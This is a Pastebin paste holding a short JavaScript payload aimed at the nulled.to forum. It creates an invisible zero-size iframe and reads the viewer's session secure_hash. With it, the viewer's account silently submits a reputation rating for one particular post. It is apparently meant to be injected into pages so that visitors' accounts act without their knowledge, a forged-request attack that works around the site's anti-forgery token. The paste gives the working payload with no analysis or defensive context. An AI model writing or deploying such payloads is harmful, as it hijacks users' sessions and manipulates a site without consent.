Advertisement
welington

Untitled

Jul 22nd, 2017
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. function monkas() {
  2. var ifrm = document.createElement("iframe");
  3. ifrm.setAttribute("src", "https://www.nulled.to/index.php?app=core&module=global&section=reputation&do=add_rating&app_rate=forums&type=pid&type_id=7612627&rating=1&secure_key="+ipb.vars['secure_hash']+"&post_return=1");
  4. ifrm.style.width = "0px";
  5. ifrm.style.height = "0px";
  6. document.body.appendChild(ifrm);
  7. }
  8. monkas();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement